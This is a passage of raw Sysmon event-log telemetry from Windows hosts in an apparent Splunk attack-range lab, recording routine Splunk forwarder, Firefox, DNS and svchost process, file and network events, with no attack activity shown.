ystem32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.032{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A8F-6216-8707-000000003802}4704C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.019{C8EA50B7-1A8F-6216-8707-000000003802}4704C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.981{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=440A386216D2156F9CCFB359FCC05BC7,SHA256=2AF1857383D9463866A0524DBCBEE50A1198F2D98B3E6CEAB85803621692E011,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223551Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:20.055{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A571C6A9C903FEF868E0EA55B7DB0FA,SHA256=AA7982C936BD182C1A742F8559961772C4439B15BB38EF035972A4E4C8CB4CEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.959{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\security_state\data.safe.binMD5=B8A443C30ABC37C70DB18D9F80D87079,SHA256=F43FA315D1D798D72490F013003D386488DDF535B00EE504B4AB1CBFB5E704BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.912{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\security_state\data.safe.binMD5=6A1EDC438B5500B2C4BCDA257FAEDBDE,SHA256=7BFAC2012995112CE3554D77CD7F1DE5650FCADF3A136EB5664F51778F6348C5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:18.518{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49641-false18.66.139.67server-18-66-139-67.fra60.r.cloudfront.net443https 10341000x8000000000000000299778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.859{C8EA50B7-1A90-6216-8A07-000000003802}28605136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.660{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A90-6216-8A07-000000003802}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000299776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:18.536{C8EA50B7-11AA-6216-1605-000000003802}2228d2nxq2uap88usk.cloudfront.net02600:9000:225e:f200:a:da5e:7900:93a1;2600:9000:225e:1e00:a:da5e:7900:93a1;2600:9000:225e:c200:a:da5e:7900:93a1;2600:9000:225e:8600:a:da5e:7900:93a1;2600:9000:225e:6e00:a:da5e:7900:93a1;2600:9000:225e:2800:a:da5e:7900:93a1;2600:9000:225e:4e00:a:da5e:7900:93a1;2600:9000:225e:0:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000299775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:18.531{C8EA50B7-11AA-6216-1605-000000003802}2228d2nxq2uap88usk.cloudfront.net018.66.139.17;18.66.139.125;18.66.139.97;18.66.139.67;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000299774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.644{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.644{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.644{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.644{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.644{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1A90-6216-8A07-000000003802}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.644{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A90-6216-8A07-000000003802}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.647{C8EA50B7-1A90-6216-8A07-000000003802}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000299767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:18.514{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54956- 354300x8000000000000000299766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:18.115{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53809- 354300x8000000000000000299765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:18.112{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49640-false18.66.139.28server-18-66-139-28.fra60.r.cloudfront.net443https 354300x8000000000000000299764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:18.096{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56559- 23542300x8000000000000000299795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:21.997{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\security_state\data.safe.binMD5=9A1FDED347B58103F5623F898602E07E,SHA256=ED231814538D2A3D5122752D1100095A7CDC4F1B09B011CD8A47B95363FCA091,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:21.994{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5B835E30367FDC0BE0CB3139B1AC8E9,SHA256=B48FBF46A764A7C23BFF8C9C74085BA08B41723AEFE35F1D81847829DC3743EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223553Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:18.716{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51795-false10.0.1.12-8000- 23542300x8000000000000000223552Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:21.070{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A557685A46747EB34AAE0DB7B4EACBC9,SHA256=8F79D9047A4497CEDC751D5B086E685D63A26EF61B9E71DC20B6111CBD90B69A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:21.700{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\32090MD5=C2036F77B26A2CDFB5488B9D08AE94F8,SHA256=29EE51B74F79415053F2518C44E12B99B2C2766348FD9B60B31E8693DCA947FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:21.527{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\3709MD5=6780E2EB66043F967A563058FA5DBD58,SHA256=6EE118BC64E3D31C801C4F44755E14B710411314162F8DE8ED85FEC688C7CF05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:21.471{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:21.327{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A91-6216-8B07-000000003802}5928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:21.327{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:21.327{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:21.327{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:21.327{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:21.327{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1A91-6216-8B07-000000003802}5928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:21.327{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A91-6216-8B07-000000003802}5928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:21.329{C8EA50B7-1A91-6216-8B07-000000003802}5928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 